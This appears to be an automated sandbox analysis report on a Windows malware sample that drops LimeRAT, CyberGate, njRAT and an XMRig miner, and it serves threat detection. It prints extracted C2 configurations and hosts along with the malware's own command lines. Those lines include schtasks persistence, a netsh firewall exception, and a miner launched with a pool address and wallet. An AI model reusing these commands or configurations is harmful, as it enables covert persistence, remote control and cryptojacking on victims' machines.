Analysis
- max time kernel: 24s
- max time network: 168s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 25-05-2022 01:11

Static task: static1
Behavioral task: behavioral1
Sample: 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe
Resource: win7-20220414-en

General
- Target: 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe
- Size: 12.1MB
- MD5: dfd75a7bf3505b1451149b8d73a359ae
- SHA1: 8db9aa88468ce61ffa43eaa195aff0eb359310b6
- SHA256: 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d
- SHA512: 2d25588092ab886c7da0f25bb1fab257e3695de43cea9e9ec7d2fbcae9262d8320500beb13cc1e76b7810db5a996b10fb1e9137ffcb8234b1595246769e93365
Malware Config

Extracted
limerat
1JBKLGyE6AnRGvk92A8x3m8qmXfh3fcEty
- aes_key: nulled
- antivm: true
- c2_url: https://pastebin.com/raw/TFJdDnm6
- delay: 33
- download_payload: false
- install: false
- install_name: Wservices.exe
- main_folder: Temp
- pin_spread: true
- sub_folder: \
- usb_spread: true

Extracted
cybergate
v1.05.1
noIP
red4.hopto.org:1552
8RJNIFAYVRO133
- enable_keylogger: true
- enable_message_box: false
- ftp_directory: ./logs/
- ftp_interval: 30
- injected_process: explorer.exe
- install_dir: SkypeUpdate
- install_file: Skype.exe
- install_flag: false
- keylogger_enable_ftp: false
- message_box_caption: Remote Administration anywhere in the world.
- message_box_title: CyberGate
- password: 12345
- regkey_hkcu: Adobefinder

Extracted
njrat
0.7d
noipchiper
red4.hopto.org:5553
ede4594ea0284ffc20ba188f3b2099c0
- reg_key: ede4594ea0284ffc20ba188f3b2099c0
- splitter: |'|'|
Signatures

XMRig Miner Payload 2 IoCs
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe | xmrig

Executes dropped EXE 10 IoCs
Processes: moxia.EXE, c.exe, li4.exe, moxiacyb.exe, n.exe, Legion Elite Proxies Grabber v1.exe, EATLFEPWN.exe
pid | process
2008 | moxia.EXE
3004 | c.exe
4708 | li4.exe
2172 | moxiacyb.exe
4920 | n.exe
1040 | Legion Elite Proxies Grabber v1.exe
408 | c.exe
1668 | EATLFEPWN.exe
5104 | c.exe
4272 | c.exe

Modifies Windows Firewall 1 TTPs

Processes:
resource | yara_rule
behavioral2/memory/5104-192-0x0000000010410000-0x0000000010471000-memory.dmp | upx
behavioral2/memory/408-189-0x0000000010410000-0x0000000010471000-memory.dmp | upx
behavioral2/memory/5104-196-0x0000000010410000-0x0000000010471000-memory.dmp | upx

Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes: n.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | n.exe

Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes: 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe, c.exe, li4.exe
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | c.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | li4.exe

Adds Run key to start application 2 TTPs 3 IoCs
Processes: moxia.EXE, moxiacyb.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce | moxia.EXE
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | moxia.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BGPRAZQPUI = "C:\\Users\\Admin\\AppData\\Local\\MQSCAPIYWJHJXYP\\SystemProcess.exe" | moxiacyb.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

AutoIT Executable 24 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\c.exe | autoit_exe
C:\Users\Admin\AppData\Local\Temp\li4.exe | autoit_exe
C:\Users\Admin\AppData\Local\Temp\n.exe | autoit_exe
C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe | autoit_exe
C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe | autoit_exe
C:\Users\Admin\AppData\Roaming\Spectrum\service.exe | autoit_exe
C:\Users\Admin\AppData\Roaming\efsui\data.exe | autoit_exe

Suspicious use of SetThreadContext 3 IoCs
Processes: li4.exe, c.exe, 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe
description | pid | process | target process
PID 4708 set thread context of 2128 | 4708 | li4.exe | RegSvcs.exe
PID 3004 set thread context of 408 | 3004 | c.exe | c.exe
PID 3232 set thread context of 2064 | 3232 | 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe | RegAsm.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Program crash 2 IoCs
Processes: WerFault.exe
pid | pid_target | process | target process
3452 | 4076 | WerFault.exe | SystemProcess.exe
1888 | 4644 | WerFault.exe | SystemProcess.exe

Creates scheduled task(s) 1 TTPs 16 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes: schtasks.exe
pid | process
4056 | schtasks.exe
608 | schtasks.exe
4052 | schtasks.exe
4772 | schtasks.exe
4476 | schtasks.exe
3720 | schtasks.exe
4560 | schtasks.exe
4904 | schtasks.exe
3756 | schtasks.exe
3480 | schtasks.exe
5036 | schtasks.exe
3968 | schtasks.exe
824 | schtasks.exe
3784 | schtasks.exe
384 | schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs
Processes: n.exe
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | n.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | n.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | n.exe

NTFS ADS 1 IoCs
Processes: n.exe
description | ioc | process
File opened for modification | C:\Users\Admin\AppData\Local\Temp\winmgmts:\root\cimv2 | n.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes: c.exe
pid | process
5104 | c.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes: EATLFEPWN.exe, c.exe
description | pid | process
Token: SeLockMemoryPrivilege | 1668 | EATLFEPWN.exe
Token: SeDebugPrivilege | 5104 | c.exe

Suspicious use of WriteProcessMemory 64 IoCs
Processes: 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe, moxia.EXE, li4.exe, c.exe, moxiacyb.exe
description | pid | process | target process
PID 3232 wrote to memory of 2008 | 3232 | 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe | moxia.EXE
PID 3232 wrote to memory of 3004 | 3232 | 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe | c.exe
PID 3232 wrote to memory of 4708 | 3232 | 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe | li4.exe
PID 2008 wrote to memory of 2172 | 2008 | moxia.EXE | moxiacyb.exe
PID 3232 wrote to memory of 4920 | 3232 | 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe | n.exe
PID 3232 wrote to memory of 1040 | 3232 | 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe | Legion Elite Proxies Grabber v1.exe
PID 4708 wrote to memory of 2128 | 4708 | li4.exe | RegSvcs.exe
PID 3004 wrote to memory of 408 | 3004 | c.exe | c.exe
PID 2172 wrote to memory of 3784 | 2172 | moxiacyb.exe | schtasks.exe
PID 2172 wrote to memory of 3756 | 2172 | moxiacyb.exe | schtasks.exe
PID 2172 wrote to memory of 1668 | 2172 | moxiacyb.exe | EATLFEPWN.exe
PID 3232 wrote to memory of 2064 | 3232 | 4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe | RegAsm.exe
PID 408 wrote to memory of 5104 | 408 | c.exe | c.exe
Processes

- Depth 1, PID 3232: C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\4689144a3abb5d8829a2dceff0a4b243f7f03323dbd440cc3377bbd5cba4744d.exe"
  Signatures: Checks computer location settings; Suspicious use of SetThreadContext; Suspicious use of WriteProcessMemory
- Depth 2, PID 2008: C:\Users\Admin\AppData\Local\Temp\moxia.EXE
  Command line: "C:\Users\Admin\AppData\Local\Temp\moxia.EXE"
  Signatures: Executes dropped EXE; Adds Run key to start application; Suspicious use of WriteProcessMemory
- Depth 3, PID 2172: C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\moxiacyb.exe
  Signatures: Executes dropped EXE; Adds Run key to start application; Suspicious use of WriteProcessMemory
- Depth 4, PID 3784: C:\Windows\SYSTEM32\schtasks.exe
  Command line: schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc minute /mo 1
  Signatures: Creates scheduled task(s)
- Depth 4, PID 3756: C:\Windows\SYSTEM32\schtasks.exe
  Command line: schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc onidle /i 1
  Signatures: Creates scheduled task(s)
- Depth 4, PID 1668: C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\LNUEFWGBWWOQ\EATLFEPWN.exe -o de2.moriaxmr.com:3333 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQtz7XNvpsygAzF9g1Y -p cyber -a cryptonight --max-cpu-usage 55
  Signatures: Executes dropped EXE; Suspicious use of AdjustPrivilegeToken
- Depth 2, PID 3004: C:\Users\Admin\AppData\Local\Temp\c.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\c.exe"
  Signatures: Executes dropped EXE; Checks computer location settings; Suspicious use of SetThreadContext; Suspicious use of WriteProcessMemory
- Depth 3, PID 408: C:\Users\Admin\AppData\Local\Temp\c.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\c.exe"
  Signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
- Depth 4, PID 5104: C:\Users\Admin\AppData\Local\Temp\c.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\c.exe"
  Signatures: Executes dropped EXE; Checks computer location settings; Suspicious behavior: GetForegroundWindowSpam; Suspicious use of AdjustPrivilegeToken
- Depth 5, PID 4272: C:\Users\Admin\AppData\Local\Temp\c.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\c.exe"
  Signatures: Executes dropped EXE
- Depth 3, PID 3720: C:\Windows\SysWOW64\schtasks.exe
  Command line: "C:\Windows\SysWOW64\schtasks.exe" /create /tn omadmprc /tr "C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe" /sc minute /mo 1 /F
  Signatures: Creates scheduled task(s)
- Depth 2, PID 4708: C:\Users\Admin\AppData\Local\Temp\li4.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\li4.exe"
  Signatures: Executes dropped EXE; Checks computer location settings; Suspicious use of SetThreadContext; Suspicious use of WriteProcessMemory
- Depth 3, PID 2128: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
- Depth 3, PID 4476: C:\Windows\SysWOW64\schtasks.exe
  Command line: "C:\Windows\SysWOW64\schtasks.exe" /create /tn auditcse /tr "C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe" /sc minute /mo 1 /F
  Signatures: Creates scheduled task(s)
- Depth 2, PID 4920: C:\Users\Admin\AppData\Local\Temp\n.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\n.exe"
  Signatures: Executes dropped EXE; Checks BIOS information in registry; Enumerates system info in registry; NTFS ADS
- Depth 3, PID 2604: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
- Depth 4, PID 556: C:\Windows\SysWOW64\netsh.exe
  Command line: netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" "RegAsm.exe" ENABLE
- Depth 3, PID 608: C:\Windows\SysWOW64\schtasks.exe
  Command line: "C:\Windows\SysWOW64\schtasks.exe" /create /tn ie4ushowIE /tr "C:\Users\Admin\AppData\Roaming\efsui\data.exe" /sc minute /mo 1 /F
  Signatures: Creates scheduled task(s)
- Depth 2, PID 1040: C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\Legion Elite Proxies Grabber v1.exe"
  Signatures: Executes dropped EXE
- Depth 2, PID 2064: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
- Depth 2, PID 824: C:\Windows\SysWOW64\schtasks.exe
  Command line: "C:\Windows\SysWOW64\schtasks.exe" /create /tn GamePanel /tr "C:\Users\Admin\AppData\Roaming\Spectrum\service.exe" /sc minute /mo 1 /F
  Signatures: Creates scheduled task(s)
- Depth 1, PID 4548: C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe
  Command line: C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe
- Depth 2, PID 2124: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
- Depth 2, PID 4056: C:\Windows\SysWOW64\schtasks.exe
  Command line: "C:\Windows\SysWOW64\schtasks.exe" /create /tn auditcse /tr "C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe" /sc minute /mo 1 /F
  Signatures: Creates scheduled task(s)
- Depth 1, PID 4596: C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
  Command line: C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
- Depth 2, PID 568: C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
  Command line: "C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe"
- Depth 2, PID 4560: C:\Windows\SysWOW64\schtasks.exe
  Command line: "C:\Windows\SysWOW64\schtasks.exe" /create /tn omadmprc /tr "C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe" /sc minute /mo 1 /F
  Signatures: Creates scheduled task(s)
- Depth 1, PID 4076: C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe
  Command line: C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe
- Depth 2, PID 3480: C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc minute /mo 1
  Signatures: Creates scheduled task(s)
- Depth 2, PID 3784: C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc onidle /i 1
  Signatures: Creates scheduled task(s)
- Depth 2, PID 3452: C:\Windows\system32\WerFault.exe
  Command line: C:\Windows\system32\WerFault.exe -u -p 4076 -s 800
  Signatures: Program crash
- Depth 1, PID 3276: C:\Users\Admin\AppData\Roaming\Spectrum\service.exe
  Command line: C:\Users\Admin\AppData\Roaming\Spectrum\service.exe
- Depth 2, PID 408: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
- Depth 2, PID 384: C:\Windows\SysWOW64\schtasks.exe
  Command line: "C:\Windows\SysWOW64\schtasks.exe" /create /tn GamePanel /tr "C:\Users\Admin\AppData\Roaming\Spectrum\service.exe" /sc minute /mo 1 /F
  Signatures: Creates scheduled task(s)
- Depth 1, PID 220: C:\Windows\system32\WerFault.exe
  Command line: C:\Windows\system32\WerFault.exe -pss -s 416 -p 4076 -ip 4076
- Depth 1, PID 4644: C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe
  Command line: C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe
- Depth 2, PID 1888: C:\Windows\system32\WerFault.exe
  Command line: C:\Windows\system32\WerFault.exe -u -p 4644 -s 800
  Signatures: Program crash
- Depth 2, PID 5036: C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc onidle /i 1
  Signatures: Creates scheduled task(s)
- Depth 2, PID 4904: C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn LNUEFWGBWWOQ /tr C:\Users\Admin\AppData\Local\MQSCAPIYWJHJXYP\SystemProcess.exe /sc minute /mo 1
  Signatures: Creates scheduled task(s)
- Depth 1, PID 4188: C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe
  Command line: C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe
- Depth 2, PID 4764: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
- Depth 2, PID 3968: C:\Windows\SysWOW64\schtasks.exe
  Command line: "C:\Windows\SysWOW64\schtasks.exe" /create /tn auditcse /tr "C:\Users\Admin\AppData\Roaming\SystemSettingsAdminFlows\service.exe" /sc minute /mo 1 /F
  Signatures: Creates scheduled task(s)
- Depth 1, PID 2396: C:\Windows\system32\WerFault.exe
  Command line: C:\Windows\system32\WerFault.exe -pss -s 484 -p 4644 -ip 4644
- Depth 1, PID 5068: C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
  Command line: C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
- Depth 2, PID 1556: C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe
  Command line: "C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe"
- Depth 2, PID 4052: C:\Windows\SysWOW64\schtasks.exe
  Command line: "C:\Windows\SysWOW64\schtasks.exe" /create /tn omadmprc /tr "C:\Users\Admin\AppData\Roaming\smss\sessionmsg.exe" /sc minute /mo 1 /F
  Signatures: Creates scheduled task(s)
- Depth 1, PID 3132: C:\Users\Admin\AppData\Roaming\Spectrum\service.exe
  Command line: C:\Users\Admin\AppData\Roaming\Spectrum\service.exe
- Depth 2, PID 1280: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
- Depth 2, PID 4772: C:\Windows\SysWOW64\schtasks.exe
  Command line: "C:\Windows\SysWOW64\schtasks.exe" /create /tn GamePanel /tr "C:\Users\Admin\AppData\Roaming\Spectrum\service.exe" /sc minute /mo 1 /F
  Signatures: Creates scheduled task(s)
- Depth 1, PID 1392: C:\Users\Admin\AppData\Roaming\efsui\data.exe
  Command line: C:\Users\Admin\AppData\Roaming\efsui\data.exe
- Depth 2, PID 2800: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

Network
MITRE ATT&CK Enterprise v6